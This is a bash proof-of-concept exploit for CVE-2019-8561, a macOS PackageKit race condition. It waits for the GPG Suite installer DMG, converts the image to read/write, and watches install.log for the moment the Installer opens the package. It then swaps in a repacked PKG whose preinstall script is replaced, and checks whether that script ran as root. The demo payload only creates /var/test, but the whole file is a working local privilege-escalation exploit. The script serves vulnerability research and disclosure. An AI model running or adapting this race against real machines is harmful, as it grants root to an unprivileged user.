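#!/bin/bash
# CVE-2019-8561/gpg_poc
#
# Proof of concept for CVE-2019-8561 (macOS PackageKit).  While the Installer
# is running a PKG that lives on a read-only DMG, this script converts the DMG
# to read/write, swaps the PKG for a copy whose preinstall script has been
# replaced, and then checks whether that script ran as root.
#
# Usage: run as the logged-in user, then download the GPG Suite DMG into
# ~/Downloads and launch its Install.pkg.  /var/log/install.log is used to
# time the swap, so it must be readable by the invoking user.
# Exit status: 0 if ${touch_path} exists and is owned by root, 1 otherwise.
# macOS only (hdiutil, pkgutil, BSD stat).
set -euo pipefail

# File the injected preinstall script creates; owned by root on success.
declare -r touch_path="/var/test"
declare -r install_log="/var/log/install.log"
declare -r downloads_dir="/Users/${USER:?}/Downloads"

# Scratch space for the expanded PKG.  mktemp -d instead of a fixed /tmp path
# so another local user cannot pre-create or symlink the directory we write to.
work_dir="$(mktemp -d)" || { echo "mktemp -d failed" >&2; exit 1; }
declare -r work_dir
declare -r expand_path="${work_dir}/Install"
# PID of the background tail -f currently in use (empty when none).
tail_pid=""

#######################################
# Exit hook: stop any tail -f we started and remove the scratch directory.
# Globals: tail_pid (read), work_dir (read)
#######################################
cleanup() {
  if [[ -n "${tail_pid}" ]]; then
    kill "${tail_pid}" 2>/dev/null || true
  fi
  rm -rf -- "${work_dir:?}"
}
trap cleanup EXIT

#######################################
# Block until a line containing $1 is appended to install.log.
# Globals:   install_log (read), work_dir (read), tail_pid (written)
# Arguments: $1 - fixed string to wait for
# Only lines written after the call are considered (tail -n 0), so a stale
# match earlier in the log does not fire.  The tail is killed once grep
# returns instead of being left behind until its next write hits SIGPIPE.
#######################################
wait_for_log_line() {
  local needle="$1"
  local fifo="${work_dir}/install_log.fifo"
  mkfifo "${fifo}"
  tail -f -n 0 "${install_log}" > "${fifo}" &
  tail_pid=$!
  grep -q -F -- "${needle}" < "${fifo}"
  kill "${tail_pid}" 2>/dev/null || true
  tail_pid=""
  rm -f -- "${fifo}"
}

#######################################
# Poll ~/Downloads every 2s until a GPG_Suite-* file appears.
# Globals: downloads_dir (read)
# Outputs: the first matching path on stdout
# A glob with an existence check replaces `ls | grep`: no word-splitting, and
# an unmatched pattern is never returned literally as the DMG path.
#######################################
find_dmg() {
  local candidate
  while true; do
    for candidate in "${downloads_dir}"/GPG_Suite-*; do
      if [[ -e "${candidate}" ]]; then
        printf '%s\n' "${candidate}"
        return 0
      fi
    done
    sleep 2   # don't hammer the directory
  done
}

#######################################
# Run the PoC end to end.
# Returns: 0 on a root-owned ${touch_path}, 1 otherwise
#######################################
main() {
  local dmg_path pkg_path preinstall_file owner

  echo "Waiting for GPG Suite DMG in ~/Downloads..."
  dmg_path="$(find_dmg)"
  echo "Found ${dmg_path}"

  echo "Converting read-only DMG to RW..."
  # Should take 2-3 seconds.  Same path in and out; -ov overwrites in place.
  hdiutil convert -ov "${dmg_path:?}" -format UDRW -o "${dmg_path:?}" > /dev/null

  echo "Resizing DMG"
  # Grow the image up front: after the legitimate PKG is deleted the volume's
  # free-space accounting lags, so without headroom the mv of the replacement
  # PKG fails and the race window closes.
  hdiutil resize -size 60m "${dmg_path}"

  echo "Waiting for PKG installer to start..."
  wait_for_log_line 'Opened from:'
  echo "PKG Install Detected"
  # Path of the PKG the Installer just opened, from the newest "Opened from:"
  # line.  The field offset assumes install.log's current format, and the
  # value comes from a log this script does not control, so confirm it is a
  # real file before anything is deleted.
  pkg_path="$(grep -F 'Opened from:' "${install_log}" | tail -1 | cut -d ' ' -f7-)" || pkg_path=""
  if [[ ! -f "${pkg_path}" ]]; then
    echo "Could not locate PKG from install.log: '${pkg_path}'" >&2
    return 1
  fi

  echo "Expanding PKG"
  pkgutil --expand "${pkg_path}" "${expand_path}"

  echo "Replacing preinstall"
  # Sub-package layout of the GPG Suite installer; adjust if the PKG changes.
  preinstall_file="${expand_path}/preinstall.pkg/Scripts/preinstall"
  # Payload the Installer runs with its own privileges: create ${touch_path}.
  printf '#!/bin/bash\ntouch %s\nchmod +x %s\n' "${touch_path}" "${touch_path}" \
    > "${preinstall_file}"
  chmod +x "${preinstall_file}"   # make sure it stays executable if recreated

  echo "Flattening malicious PKG..."
  pkgutil --flatten "${expand_path}" "${expand_path}.pkg"
  # The flattened PKG comes out owned by ${USER}:wheel, which makes the later
  # mv onto the DMG volume fail; give it the usual user:staff ownership first.
  chown "${USER}:staff" "${expand_path}.pkg"

  echo "Removing ${pkg_path}"
  rm -f -- "${pkg_path:?}"
  echo "Replacing Install.pkg with malicious PKG"
  mv -- "${expand_path}.pkg" "${pkg_path}"
  echo "Removing Expanded PKG"
  rm -rf -- "${expand_path:?}"

  echo "Wait for it..."
  wait_for_log_line 'End install'
  # Success means the injected preinstall ran as root.  BSD stat instead of
  # parsing ls output for the owner.
  if [[ -f "${touch_path}" ]]; then
    owner="$(stat -f '%Su' "${touch_path}")"
    if [[ "${owner}" == "root" ]]; then
      echo "Exploit successful!"
      return 0
    fi
  fi
  echo "Exploit unsuccessful"
  return 1
}

main "$@"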